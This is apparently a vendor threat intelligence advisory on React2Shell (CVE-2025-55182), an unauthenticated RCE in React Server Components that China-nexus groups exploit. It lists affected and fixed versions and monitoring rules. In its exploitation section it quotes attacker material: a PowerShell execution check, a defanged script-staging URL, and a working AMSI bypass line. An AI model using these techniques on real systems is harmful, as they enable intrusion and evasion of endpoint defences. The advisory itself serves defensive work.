China-Nexus APTs Rapidly Exploit React2Shell

Published Date: December 8, 2025
Category: ShadowOpsIntel
Share:

React2Shell (CVE-2025-55182) is a severe unauthenticated remote code execution (RCE) vulnerability affecting React Server Components (RSC) via the Flight protocol. The flaw lies in insecure deserialization, allowing attackers to send malicious payloads that are executed server-side. Widely used frameworks like Next.js are affected in default configurations. The vulnerability is being actively exploited in the wild by automated botnets and state-sponsored threat actors, including China-nexus groups.

Severity: Critical

Vulnerability Details

  • CVE ID: CVE-2025-55182 (React.js), CVE-2025-66478 (Next.js – later marked duplicate)
  • Severity: 10.0
  • Component: react-server in React 19.x, and bundled versions in Next.js 15.x/16.x
  • Root Cause: Insecure deserialization in the Flight protocol used by React Server Components
  • Impact: Unauthenticated RCE through specially crafted HTTP POST requests
  • Affected Products:
    • react-server-dom: 19.0.x, 19.1.x, 19.2.x
    • Next.js with App Router: 14.3.0-canary.77 and later canary releases, 15.x, 16.x
  • Fixed Versions:
    • react-server-dom: 19.0.1, 19.1.2, and 19.2.1
    • Next.js with App Router: 14.x stable, 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7

Exploitation Details

  1. Timeline: Exploitation attempts were observed by Amazon threat intelligence, Wiz Research, Datadog, and GreyNoise starting as early as December 4, 2025, just hours after public disclosure.
  2. Threat Actor: China-nexus APT groups including Earth Lamia and Jackpot Panda.
  3. Initial Access
    • Attackers send malformed RSC payloads to server endpoints.
    • Simple crafted request triggers the vulnerable deserialization flow.
    • No authentication is required.
  4. PoE (Proof-of-Execution) Validation
    • Common pattern: powershell -c “40138*41979” used to confirm code execution
    • Leaves minimal logs or artifacts, aiding stealth
  5. Post-Exploitation
    • Stage 1: Encoded PowerShell payloads using powershell -enc
    • Stage 2: Encoded PowerShell payloads that fetch malicious scripts from http[:]//23[.]235[.]188[.]3:652/qMqSb
    • AMSI bypass via: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
  6. Post-Exploitation Goals
    Once access is gained, observed goals include:
    • Establishing shells to harvest credentials from environment variables, filesystems, and cloud instance metadata.
    • Attempts to identify and Base64 encode AWS credentials for exfiltration.
    • Post-exploitation campaigns include cryptomining (e.g., dropping the XMRig miner) and attempting to install malware frameworks like Sliver.

Recommendations

  1. Update affected React/Next.js applications to the latest fixed versions.
  2. Review the permissions and access rights of the user or system account running the React/Next.js server. Minimize access to the filesystem, network resources, and especially cloud metadata services (e.g., AWS EC2 Instance Metadata Service) to limit the impact of an RCE.
  3. Monitor for:
    • POST requests with headers like next-action, rsc-action-id
    • Request bodies containing patterns: $@, “status”:”resolved_model”
    • User agents include Go-http-client/1.1, Assetnote/1.0.0, Safari 17.2.1, and custom Python scripts
  4. Alert on powershell.exe / pwsh.exe combined with -enc / -EncodedCommand and DownloadString( or IEX.
  5. Look for Event ID 4104 with suspicious AMSI or reflection keywords.
  6. Block the IOCs at their respective controls
    https://www.virustotal.com/gui/collection/e77fd2bbb0d2070967b8462ea95e74e08923069e3ddbef6dc7095a840e6d2da7/iocs

Source:

  • https://react2shell.com/
  • https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/
  • https://www.greynoise.io/blog/cve-2025-55182-react2shell-opportunistic-exploitation-in-the-wild-what-the-greynoise-observation-grid-is-seeing-so-far
  • https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182#which-actions-should-security-teams-take-22

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.

Ampcus Cyber
Privacy Overview

This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.